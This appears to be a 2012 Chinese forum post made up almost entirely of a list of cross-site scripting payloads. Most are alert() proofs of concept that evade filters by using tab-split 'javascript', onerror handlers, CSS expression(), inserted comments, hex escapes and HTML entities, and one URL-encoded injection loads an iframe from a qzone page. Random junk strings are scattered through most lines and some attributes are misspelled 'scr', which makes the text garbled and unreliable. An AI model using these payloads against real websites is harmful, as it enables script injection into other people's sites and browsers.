<script>alert("跨站")</script> (最常用)/ T0 B3 l% k/ E1 l" j" J
<img scr=javascript:alert("跨站")></img>- h& n" C9 W8 S5 Q5 g' T V" ^
<img scr="javascript: alert(/跨站/)></img>
# N& `! }1 Y: S, i# b<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
! C) i& Z5 Y0 g! Q<img scr="#" onerror=alert(/跨站/)></img>
& b! E- x% V, h3 a- ^& }$ ~<img scr="#" style="xss:expression(alert(/xss/));"></img>4 u" @. h7 i. {" s& X8 F
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)' k7 P, q% X# A% f' c! D; ~7 T
<img src=vbscript:msgbox ("xss")></img>
) `) ?$ W. F7 n6 g; i0 E, w<style> input {left:expression (alert('xss'))}</style>8 H* D: x: D+ R8 }4 x* c9 O
<div style={left:expression (alert('xss'))}></div>$ l1 C/ W" v/ e9 C/ z7 S
<div style={left:exp/* */ression (alert('xss'))}></div>( @5 ~6 M. C1 V
<div style={left:\0065\0078ression (alert('xss'))}></div>
* o9 \8 Y, }* ?7 bhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
0 m: A# [/ T# p( G4 Junicode <div style="{left:expRessioN (alert('xss'))}">! d7 h0 l5 S1 |+ l+ ?
2 \: ~/ J X3 u9 H
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
) k/ g1 {6 G% g: D+ o |
发表于 2012-9-13 17:15:04
收藏
支持
反对